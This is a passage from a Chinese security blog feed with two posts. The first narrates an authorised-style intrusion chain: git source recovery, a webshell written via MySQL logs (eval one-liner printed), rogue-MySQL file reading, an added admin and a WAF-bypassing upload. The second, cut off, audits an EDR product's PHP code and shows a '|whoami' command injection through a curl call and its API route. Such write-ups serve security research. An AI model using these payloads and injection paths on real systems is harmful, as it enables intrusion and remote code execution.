      &lt;td&gt;存放一些钩子脚本&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;.git/HEAD&lt;/td&gt;
      &lt;td&gt;文件&lt;/td&gt;
      &lt;td&gt;记录分支&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;.git/objects&lt;/td&gt;
      &lt;td&gt;文件夹&lt;/td&gt;
      &lt;td&gt;存放所有数据&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;.git/refs&lt;/td&gt;
      &lt;td&gt;文件夹&lt;/td&gt;
      &lt;td&gt;存放提交对象的指针&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;知道结构及其作用后，挑重点关注&lt;code&gt;objects&lt;/code&gt;这个目录，但一看，全都是一些Hash命名的文件，根本不知道其对应关系:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054656504449.jpg&quot; alt=&quot;-w1102&quot; /&gt;&lt;/p&gt;

&lt;p&gt;并且这些文件都没办法看:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054659230739.jpg&quot; alt=&quot;-w822&quot; /&gt;&lt;/p&gt;

&lt;p&gt;查阅相关资料得知此类文件是将原文件内容经过&lt;code&gt;zlib&lt;/code&gt;的&lt;code&gt;deflate&lt;/code&gt;压缩后存储的( https://mirrors.edge.kernel.org/pub/software/scm/git/docs/user-manual.html#object-details ):&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054659652391.jpg&quot; alt=&quot;-w1145&quot; /&gt;&lt;/p&gt;

&lt;p&gt;而使用&lt;code&gt;zlib&lt;/code&gt;进行解压查看文件内容时是这样的:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054674810483.jpg&quot; alt=&quot;-w1222&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这个文件更像是记录了一个目录结构，而关于此就又需要查阅资料了，具体请看: https://git-scm.com/book/zh/v2/Git-%E5%86%85%E9%83%A8%E5%8E%9F%E7%90%86-Git-%E5%AF%B9%E8%B1%A1&lt;/p&gt;

&lt;p&gt;git中的对象(&lt;strong&gt;对象对应文件&lt;/strong&gt;)&lt;code&gt;.git/objects&lt;/code&gt;包含了:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;SHA(所有用来表示项目历史信息的文件,是通过一个40个字符的（40-digit）“对象名”来索引的)&lt;/li&gt;
  &lt;li&gt;Blob对象(用来存储文件的内容)&lt;/li&gt;
  &lt;li&gt;Tree对象(有一串bunch指向Blob对象或是其它Tree对象的指针，一般表示内容之间的目录层次关系)&lt;/li&gt;
  &lt;li&gt;Commit对象(指向一个Tree对象, 并且带有相关的描述信息.)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059691330110.jpg&quot; alt=&quot;-w481&quot; /&gt;
(注: 图片来自 git-scm.com )&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;猜测&lt;/strong&gt;: 按照这个逻辑，我们需要先获取&lt;code&gt;Commit&lt;/code&gt;对象对应文件找到&lt;code&gt;Tree&lt;/code&gt;对象对应文件再通过其获得&lt;code&gt;Blob&lt;/code&gt;对象对应文件，最后解压即可获得源文件内容。&lt;/p&gt;

&lt;p&gt;那这些对象内容都存储在哪里呢？通过之前使用&lt;code&gt;Binwalk&lt;/code&gt;分析，显而易见，在&lt;code&gt;.git/index&lt;/code&gt;文件中。&lt;/p&gt;

&lt;p&gt;但是在这里&lt;code&gt;.git/index&lt;/code&gt;文件无法直接查看，直接套用&lt;code&gt;GitHack&lt;/code&gt;的( https://github.com/lijiejie/GitHack/blob/master/lib/parser.py )解析代码就行:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059735242568.jpg&quot; alt=&quot;-w716&quot; /&gt;&lt;/p&gt;

&lt;p&gt;获得SHA1: &lt;code&gt;a797b1973fd62dc34a691c7fe3bce33a504f2b74&lt;/code&gt;，但是找了半天没找到这个对应文件​，后来尝试搜索前几位和后几位，发现搜索到了后几位:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059737421527.jpg&quot; alt=&quot;-w664&quot; /&gt;&lt;/p&gt;

&lt;p&gt;对比发现文件名和获取的SHA1值少了2位:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059738182126.jpg&quot; alt=&quot;-w387&quot; /&gt;&lt;/p&gt;

&lt;p&gt;搜索发现原来前两位是作为了目录名:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059738625732.jpg&quot; alt=&quot;-w556&quot; /&gt;&lt;/p&gt;

&lt;p&gt;但在这里，我们使用&lt;code&gt;zlib&lt;/code&gt;去解压缩，发现存储在&lt;code&gt;.git/index&lt;/code&gt;的SHA1值实际上就是一个&lt;code&gt;blob&lt;/code&gt;对象的值，也就根本不需要获取&lt;code&gt;commit&lt;/code&gt;、&lt;code&gt;tree&lt;/code&gt;对象的值了，表示之前的顺序逆推逻辑是错误的:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059739165413.jpg&quot; alt=&quot;-w746&quot; /&gt;&lt;/p&gt;

&lt;p&gt;接下来按照这个思路去编写脚本恢复源码即可。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;编写与恢复&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;由于项目时间原因简单了解原理之后，没有过多的去研究，也不打算使用原生方法去恢复，还是采用最暴力的方法，使用命令行去恢复&lt;code&gt;.git&lt;/code&gt;，想要让Git回退历史，使用&lt;code&gt;git reset --hard commit_id&lt;/code&gt;命令，进行版本回退。&lt;/p&gt;

&lt;p&gt;基于这个命令，我需要获取网站的这几个文件/目录:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;&lt;code&gt;.git/index&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code&gt;.git/logs&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code&gt;.git/head&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code&gt;.git/objects&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code&gt;.git/refs&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;先下载&lt;code&gt;.git/index&lt;/code&gt;、&lt;code&gt;.git/head&lt;/code&gt;、&lt;code&gt;.git/refs&lt;/code&gt;、&lt;code&gt;.git/logs&lt;/code&gt;(文件目录都是固定的无需考虑其他情况)而后解析&lt;code&gt;index&lt;/code&gt;获取索引，根据索引依次下载&lt;code&gt;.git/objects&lt;/code&gt;内的文件，最后全部下载完毕，获取&lt;code&gt;master&lt;/code&gt;分支(&lt;code&gt;refs/heads/master&lt;/code&gt;文件)对应的值带入该命令&lt;code&gt;git reset --hard commit_id&lt;/code&gt;即可恢复:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054710482497.jpg&quot; alt=&quot;-w793&quot; /&gt;&lt;/p&gt;

&lt;p&gt;但发现除此之外，发现恢复的文件寥寥无几，后来下载&lt;code&gt;.git/logs/head&lt;/code&gt;发现该&lt;code&gt;.git&lt;/code&gt;项目还有其他分支:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059680019130.jpeg&quot; alt=&quot;-w742&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这个记录中有两个SHA1的值，&lt;code&gt;master&lt;/code&gt;对应前者，&lt;code&gt;shop&lt;/code&gt;对应后者，简单修改命令&lt;code&gt;git reset --hard shop_commit_id&lt;/code&gt;，还是那一套流程，恢复&lt;code&gt;shop&lt;/code&gt;这个分支的源码即可。&lt;/p&gt;

&lt;h3 id=&quot;获取子域-webshell&quot;&gt;获取子域 Webshell&lt;/h3&gt;

&lt;p&gt;获得源码之后翻数据库账号密码:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054714423847.jpg&quot; alt=&quot;-w307&quot; /&gt;&lt;/p&gt;

&lt;p&gt;由于之前我们已经有了一个&lt;code&gt;phpinfo()&lt;/code&gt;探针，网站绝对路径已知，所以直接上&lt;code&gt;phpMyAdmin&lt;/code&gt;登录，尝试使用&lt;code&gt;into outfile&lt;/code&gt;，有&lt;code&gt;--secure-file-priv&lt;/code&gt;限制无法写入:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054716403383.jpg&quot; alt=&quot;-w767&quot; /&gt;&lt;/p&gt;

&lt;p&gt;转而使用Mysql Log日志存储的方式进行写入:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-sql&quot;&gt;set global general_log=on;
set global_log_file=&apos;/xxx/www/xxx.php&apos;;
select &apos;&amp;lt;?php @eval($_REQUEST[&quot;xxx&quot;]);?&amp;gt;&apos;;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;访问相关文件却提示我无法访问(&lt;strong&gt;403/AccessDefined&lt;/strong&gt;):&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054717903557.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;遇到这种情况尝试以下几种方法:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;修改后缀访问，判断是否是只针对脚本后缀进行限制（上传.htaccess文件）&lt;/li&gt;
  &lt;li&gt;修改内容访问，判断是否有安全防护对内容进行限制&lt;/li&gt;
  &lt;li&gt;如若以上均未访问成功，则可以考虑覆盖原文件写入&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;这里我的情况是第三种，大概推测可能是因为新建的文件没有执行权限所导致，因为这里我们已经有源码了所以可以直接找已有的文件(&lt;strong&gt;建议选择非业务相关的文件&lt;/strong&gt;)进行写入(&lt;strong&gt;记得事后恢复&lt;/strong&gt;):&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054723563640.jpg&quot; alt=&quot;-w562&quot; /&gt;&lt;/p&gt;

&lt;p&gt;执行&lt;code&gt;phpinfo();&lt;/code&gt;函数可以，但无法直接使用管理工具连接，抓包发现目标网站上了云WAF，对请求内容拦截了(该WAF还挺弱)，这种情况还是有很多中方式:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;配合Cknife、蚁剑等自定义修改传输内容(Base64编码等等)，但需要修改PHP文件内容配合解码&lt;/li&gt;
  &lt;li&gt;直接上冰蝎、哥斯拉的马就行了&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;为图方便，选择&lt;code&gt;冰蝎3&lt;/code&gt;，使用&lt;code&gt;file_put_contents&lt;/code&gt;写入连接就行(这都不拦，WAF堪忧):&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054723222387.jpg&quot; alt=&quot;-w362&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054724217021.jpg&quot; alt=&quot;-w699&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;瞄准靶标&quot;&gt;瞄准靶标&lt;/h3&gt;

&lt;p&gt;进入子域的Webshell发现内网无机器、就是一个云服务器，一开始误以为打中靶标，因为在主战发现一个路径泄漏:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059692424662.jpg&quot; alt=&quot;-w503&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059693308877.jpg&quot; alt=&quot;-w170&quot; /&gt;&lt;/p&gt;

&lt;p&gt;而子域服务器上也有对应目录并且文件一模一样，但是修改文件却没反应不生效，猜测很有可能主战业务曾经在这个子域服务器上，但后期进行了转移，原Web文件还留着。&lt;/p&gt;

&lt;p&gt;尝试翻翻源码，找密码，后来找到了几个有用的东西:1.Adminer文件 2.数据配置信息&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059695408421.jpg&quot; alt=&quot;-w500&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Adminer&lt;/code&gt;（类似phpMyAdmin的数据库管理工具）文件是随机的: &lt;code&gt;adminerxxxxxxxxx.php&lt;/code&gt;，完全无法扫到，数据库配置密码与子域完全一样。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059702838497.jpg&quot; alt=&quot;-w626&quot; /&gt;&lt;/p&gt;

&lt;p&gt;使用数据配置密码无法登录，但是这里&lt;code&gt;Adminer&lt;/code&gt;可以直接连外网的&lt;code&gt;Mysql&lt;/code&gt;数据库，使用脚本( https://github.com/Gifts/Rogue-MySql-Server )伪造一个Mysql服务端读取对应文件就好，这边以&lt;code&gt;/etc/passwd&lt;/code&gt;为例:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059704881880.jpg&quot; alt=&quot;-w599&quot; /&gt;&lt;/p&gt;

&lt;p&gt;如上图所示是成功读取到的，而我们在子域上也知道了对应的配置文件路径，直接伪造读取即可。&lt;/p&gt;

&lt;p&gt;再使用Adminer登录进去时，使用如下几种方法尝试获取Webshell:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;into outfile -&amp;gt; 失败&lt;/li&gt;
  &lt;li&gt;Mysql log -&amp;gt; 失败&lt;/li&gt;
  &lt;li&gt;Adminer是最新版本无漏洞 -&amp;gt; 失败&lt;/li&gt;
  &lt;li&gt;获取管理员密码无法解密 -&amp;gt; 失败&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;最终选择添加新管理员登录:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059709196188.jpg&quot; alt=&quot;-w592&quot; /&gt;&lt;/p&gt;

&lt;p&gt;登录之后寻找对应上传点(以最短攻击路径的方式进行GetWebShell):&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059709890399.jpg&quot; alt=&quot;-w551&quot; /&gt;&lt;/p&gt;

&lt;p&gt;测试如下后缀及服务器结果:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;Key.jpg -&amp;gt; 上传成功
Key.php -&amp;gt; 上传失败WAF拦截
Key.phtml -&amp;gt; 上传失败文件类型不允许
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059713996506.jpg&quot; alt=&quot;-w474&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059714116942.jpg&quot; alt=&quot;-w356&quot; /&gt;&lt;/p&gt;

&lt;p&gt;我们在已经有源码的情况下，找到对应的代码进行审计就行，发现这里是白名单设置无法绕过:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059714739649.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;直接关键词寻找上传功能，发现函数:&lt;code&gt;xxx_upload_file&lt;/code&gt;存在任意文件上传&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059715071352.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;后续构建请求包以及使用回车直接绕过&lt;code&gt;CloudWAF&lt;/code&gt;，上传成功:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059715574505.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16059716055507.jpg&quot; alt=&quot;-w436&quot; /&gt;&lt;/p&gt;

&lt;p&gt;至此靶标拿到，结束。&lt;/p&gt;

&lt;h1 id=&quot;文末&quot;&gt;文末&lt;/h1&gt;

&lt;p&gt;很多时候还是需要去探寻事物的本质和原理，才能更加清晰明了的了解这个事物，否则什么东西都是现有的成品一把梭，遇到梭不了，容易出现惯性思维，可能就直接略过了。&lt;/p&gt;

</description>
          <pubDate>2020-11-22T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2020-11-22/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2020-11-22/1</guid>
        </item>
      
    
      
        <item>
          <title>某终端检测响应平台代码审计挖掘（RCE）</title>
          <description>&lt;h1 id=&quot;某终端检测响应平台代码审计挖掘rce&quot;&gt;某终端检测响应平台代码审计挖掘（RCE）&lt;/h1&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;继上一次对某终端检测响应平台&lt;strong&gt;权限绕过&lt;/strong&gt;漏洞的审计流程，现分享对该平台进行代码审计后挖掘到的远程命令执行漏洞。&lt;/p&gt;

&lt;p&gt;上篇文章其实采用的是通读代码逻辑的方法进行漏洞挖掘，那么本次我们使用敏感函数回溯的方法（代码审计方法通常分为三类: 通读全文、敏感函数参数回溯、定向功能分析）来进行漏洞挖掘。&lt;/p&gt;

&lt;h2 id=&quot;审计流程&quot;&gt;审计流程&lt;/h2&gt;

&lt;h2 id=&quot;定位敏感函数&quot;&gt;定位敏感函数&lt;/h2&gt;

&lt;p&gt;前文说到，不是一把梭的0day都不叫0day，所以我们可以对命令执行、代码执行等漏洞相关敏感函数进行全文搜索，敏感函数列表如下 :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;exec()
passthru()
proc_open()
shell_exec()
system()
popen()
eval() //非函数
assert()
preg_replace()
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;搜索关键词 &lt;code&gt;exec(&lt;/code&gt;，发现一处文件 &lt;code&gt;/ldb/dc.php&lt;/code&gt; 自定义了命令执行代码，函数体是调用的 &lt;code&gt;exec&lt;/code&gt; 函数 :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/**
 * 执行外部程序
 * @param string $command 执行命令
 * @param array  $output  输出信息
 * @param int    $ret     返回值
 * @return string 返回执行结果
 */
function ldb_exec($command, &amp;amp;$output, &amp;amp;$ret) {
    if (!ldb_is_linux()) {
        $data = exec($command, $output, $ret);
    } else {
        pcntl_signal(SIGCHLD, SIG_DFL);
        $data = exec($command, $output, $ret);
        pcntl_signal(SIGCHLD, SIG_IGN);
    }
    return $data;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;寻找危险点&quot;&gt;寻找危险点&lt;/h2&gt;

&lt;h3 id=&quot;binmapreduceappwebdevice_linkageprocess_csspphp&quot;&gt;/bin/mapreduce/app/web/device_linkage/process_cssp.php&lt;/h3&gt;

&lt;h4 id=&quot;exec_slog_action-匿名函数分析&quot;&gt;exec_slog_action 匿名函数分析&lt;/h4&gt;

&lt;p&gt;如上所述，我们知道了 &lt;code&gt;ldb_exec&lt;/code&gt; 函数为自定义命令执行代码，我们想寻找利用点就需要跟踪下该函数在哪被引用，然后分析具体的代码看是否可以利用。&lt;/p&gt;

&lt;p&gt;老套路，全局搜索 &lt;code&gt;ldb_exec(&lt;/code&gt; 发现有很多处调用了，其中阅读起来较为通俗易懂的为 &lt;code&gt;/bin/mapreduce/app/web/device_linkage/process_cssp.php&lt;/code&gt; 的匿名函数 &lt;code&gt;$exec_slog_action&lt;/code&gt; :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$exec_slog_action = function($object,$params){
    $data = $params[&quot;data&quot;];

    if (!isset($data[&quot;params&quot;])) {
        ldb_error(&quot;required parameter missing params is&quot;.json_encode($params));
        $object-&amp;gt;err_code = EXEC_SLOG_ACTION_PARAM_ERROR;
        return -1;
    }

    $data[&quot;params&quot;] = ldb_mapreduce_invoke(&quot;call_method&quot;, &quot;app.web.common.validation.shell_injection_check&quot;,
        &quot;shell_argv_transform&quot;, $data[&quot;params&quot;]);

    $command = &quot;curl -k &apos;http://127.0.0.1:9081/?&quot;.$data[&quot;params&quot;].&quot;&apos;&quot;;
    ldb_debug(&quot;exec command: &quot;.$command);
    ldb_exec($command, $output, $ret);
    if ($ret !== 0) {
        ldb_error(&quot;exec slog action fail, command: $command, error: &quot;.$output);
        $object-&amp;gt;err_code = EXEC_SLOG_ACTION_FAILED;
        return -1;
    }

    $data = $output;
    response_linkage_dev_msg(SUCCESS,$data);
    return 0;
};
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这段代码很容易理解，赋值校验，再过一遍 &lt;code&gt;/bin/mapreduce/app/web/common/validation/shell_injection_check&lt;/code&gt; 文件 函数 &lt;code&gt;shell_argv_transform&lt;/code&gt; :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;// 转义参数
$shell_argv_transform = function($argv) use(&amp;amp;$shell_argv_transform)
{
    $type = strtolower(gettype($argv));
    if ($type == &quot;array&quot;) 
    {
        foreach ($argv as $key =&amp;gt; $value)
        {
            $argv[$key] = $shell_argv_transform($value);
        }
    } 
    else if (!is_null($argv) &amp;amp;&amp;amp; !empty($argv)) 
    {
        $argv = escapeshellarg($argv);
    }
    
    return $argv;
};
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这就是一段简单的转义，如果传入的变量 &lt;code&gt;$argv&lt;/code&gt; 是数组则遍历进行函数递归最后通过 &lt;code&gt;escapeshellarg&lt;/code&gt; 函数转义（ 官方释义: &lt;strong&gt;escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，并且还是确保安全的。&lt;/strong&gt; ），如果不是数组则直接进行增加转义。&lt;/p&gt;

&lt;p&gt;继续跟进看代码，你会发现 &lt;code&gt;$command = &quot;curl -k &apos;http://127.0.0.1:9081/?&quot;.$data[&quot;params&quot;].&quot;&apos;&quot;;&lt;/code&gt; 是拼接的，最后经过 &lt;code&gt;ldb_exec&lt;/code&gt; 进行命令执行，我们可以使用管道符的方式进行其他命令的注入: &lt;code&gt;|whoami&lt;/code&gt;，但这里巧妙的是经过 &lt;code&gt;escapeshellarg&lt;/code&gt; 函数处理后注入的命令就变成了 &lt;code&gt;&apos;|whoami&apos;&lt;/code&gt;，最后执行的命令就变成了: &lt;code&gt;curl -k &apos;http://127.0.0.1:9081/?&apos;|whoami&apos;&apos;&lt;/code&gt;，直接帮助我们闭合命令了。&lt;/p&gt;

&lt;p&gt;那么我们只需要可以控制 &lt;code&gt;$params[&apos;data&apos;][&apos;params&apos;]&lt;/code&gt; 的值即可进行命令执行。&lt;/p&gt;

&lt;h2 id=&quot;控制点寻找&quot;&gt;控制点寻找&lt;/h2&gt;

&lt;h3 id=&quot;binwebdev_linkage_launchphp&quot;&gt;/bin/web/dev_linkage_launch.php&lt;/h3&gt;

&lt;h4 id=&quot;get_opr-函数分析&quot;&gt;get_opr 函数分析&lt;/h4&gt;

&lt;p&gt;由于 &lt;code&gt;/bin/mapreduce/&lt;/code&gt; 下的文件，我们没办法直接访问调用就需要全局搜索 &lt;code&gt;exec_slog_action&lt;/code&gt; 看下谁调用了这段代码，发现文件 &lt;code&gt;/bin/web/dev_linkage_launch.php&lt;/code&gt;（ 此处应感觉到兴奋，毕竟我们能访问的路径就是 &lt;code&gt;/bin/web/&lt;/code&gt; ） 有一处可疑函数体（ 函数 &lt;code&gt;get_opr&lt;/code&gt; ） :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;function get_opr($req_url){
    ...
    //CSSP请求
    if($req_url === STD_CSSP_EXEC_SLOG_ACTION_URL ){
        return EXEC_SLOG_ACTION;
    }
    ...
    //检查url的合法性
    if($req_url !== AGENT_INFO_URL &amp;amp;&amp;amp;
       $req_url !== SCAN_ABOUT_URL &amp;amp;&amp;amp;
       $req_url !== EDR_INFO_ABOUT_URL &amp;amp;&amp;amp;
       $req_url !== EVIDENCE_INFO_URL){
        ldb_error(&quot;no response about this url :&quot;.$req_url);
        throw new Exception(ldb_get_lang(&quot;NO_RESPONSE_ABOUT_THIS_URL&quot;));
    }
    //获取url中的参数
    $url_params = get_url_param();
    $method = $url_params[METHOD];
    global $opr_arr;
    if(isset($opr_arr[$method])){
        $opr = $opr_arr[$method];
    }
    else{//无此url的响应
        ldb_error(&quot;no response about this url: &quot; .$req_url);
        throw new Exception(ldb_get_lang(&quot;NO_RESPONSE_ABOUT_THIS_URL&quot;));
    }
    return $opr;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;判断变量 &lt;code&gt;$req_url&lt;/code&gt; 值是否与常量 &lt;code&gt;STD_CSSP_EXEC_SLOG_ACTION_URL&lt;/code&gt; 值一致，一致则返回常量 &lt;code&gt;EXEC_SLOG_ACTION&lt;/code&gt;，最后如果请求的地址非常量中定义的，则进行URL判断合法性（ 我们没办法直接访问 &lt;code&gt;dev_linkage_launch.php&lt;/code&gt; ）。&lt;/p&gt;

&lt;p&gt;我们先看常量 &lt;code&gt;STD_CSSP_EXEC_SLOG_ACTION_URL&lt;/code&gt; 对应值，直接看代码开头包含了哪些文件即可 :&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15981261213631.jpg&quot; alt=&quot;-w938&quot; /&gt;&lt;/p&gt;

&lt;p&gt;最终发现 &lt;code&gt;/bin/mapreduce/app/web/device_linkage/common/common.php&lt;/code&gt; 中定义了常量 :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;define(&quot;STD_CSSP_EXEC_SLOG_ACTION_URL&quot;,&quot;/api/edr/sangforinter/v2/cssp/slog_client&quot;);
&lt;/code&gt;&lt;/pre&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;define(&quot;EXEC_SLOG_ACTION&quot;,&quot;exec_slog_action&quot;);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;知道了这些常量的定义，大致就明白了，&lt;strong&gt;（ 猜测 ）&lt;/strong&gt;当我们访问 &lt;code&gt;/api/edr/sangforinter/v2/cssp/slog_client&lt;/code&gt; 时，函数 &lt;code&gt;get_opr&lt;/code&gt; 返回 &lt;code&gt;exec_slog_action&lt;/code&gt;，也就是我们之前所发现存在安全风险的函数，这也仅仅是猜测，但想要证实这个猜测，我们就得啃一啃文件 &lt;code&gt;/bin/web/dev_linkage_launch.php&lt;/code&gt;。&lt;/p&gt;

&lt;h4 id=&quot;get_interface_data-函数分析&quot;&gt;get_interface_data 函数分析&lt;/h4&gt;

&lt;p&gt;我们已经知道了函数 &lt;code&gt;get_opr&lt;/code&gt; 的作用（ 返回接口方法 ），来看看在文件中的哪里被调用，发现一处调用 :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;function get_interface_data($argv) {
    //获取url
    $req_url = $_SERVER[&apos;PHP_SELF&apos;];
    //校验token
    check_token($req_url);
    //构造opr
    $opr = get_opr($req_url);
    //根据方法构造业务代码路径
    $app_name = get_app_name($opr);
    $data = array();
    if($_SERVER[&apos;REQUEST_METHOD&apos;] == &apos;POST&apos;){
        $data = get_body_data($argv);
    }
    //根据opr、app_name以及data构造数据
    $interface_data = array();
    $interface_data[&quot;app_args&quot;][&quot;name&quot;] = $app_name;
    $interface_data[&quot;opr&quot;] = $opr;
    if($_SERVER[&apos;REQUEST_METHOD&apos;] == &apos;POST&apos;){
        $interface_data[&quot;data&quot;] = $data;
    }
    return $interface_data;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;函数 &lt;code&gt;get_interface_data&lt;/code&gt; 调用了函数 &lt;code&gt;get_opr&lt;/code&gt;，传递参数值为 &lt;code&gt;$req_url = $_SERVER[&apos;PHP_SELF&apos;];&lt;/code&gt;，也就是请求的 &lt;code&gt;URI&lt;/code&gt; ( 例如请求地址为 &lt;code&gt;http://localhost/chen.php&lt;/code&gt; 那么 &lt;code&gt;$_SERVER[&apos;PHP_SELF&apos;]&lt;/code&gt; 的值即为 &lt;code&gt;/chen.php&lt;/code&gt; )。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;注&lt;/strong&gt;：这里证实了我们在分析 &lt;code&gt;get_opr&lt;/code&gt; 函数时的猜测，请求的地址必须为 &lt;code&gt;/bin/mapreduce/app/web/device_linkage/common/common.php&lt;/code&gt; 文件中定义常量的地址，不能为 &lt;code&gt;dev_linkage_launch.php&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;那么想要进入调用函数 &lt;code&gt;get_opr&lt;/code&gt; 的逻辑，我们需要先了解下函数 &lt;code&gt;get_interface_data&lt;/code&gt; 的逻辑，在此之前我们需要确保自己不会做&lt;strong&gt;无用功&lt;/strong&gt;，所以需要看下函数 &lt;code&gt;get_interface_data&lt;/code&gt; 是否在上下文代码中被调用 :&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15981340754516.jpg&quot; alt=&quot;-w711&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15981340883961.jpg&quot; alt=&quot;-w289&quot; /&gt;&lt;/p&gt;

&lt;p&gt;该函数直接被入口函数调用，那么我们接下来就可以分析下该函数逻辑，根据注释我们了解到这里会校验token，也就是函数 &lt;code&gt;check_token&lt;/code&gt;。&lt;/p&gt;

&lt;h5 id=&quot;check_token-绕过&quot;&gt;check_token 绕过&lt;/h5&gt;

&lt;p&gt;跟进函数 &lt;code&gt;check_token&lt;/code&gt;，其代码如下 :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/**
 * @func        检验token
 * @param       string $req_url 联动的url
 * @throws      Exception
 */
function check_token($req_url){
    //CSSP接口使用特权IP的方式进行校验
    if (strpos($req_url, STD_CSSP_REQUEST_URL_PREFIX) !== false &amp;amp;&amp;amp; $req_url != STD_CSSP_SET_KEY_URL) {
        parse_str($_SERVER[&apos;QUERY_STRING&apos;],$query_str_parsed);
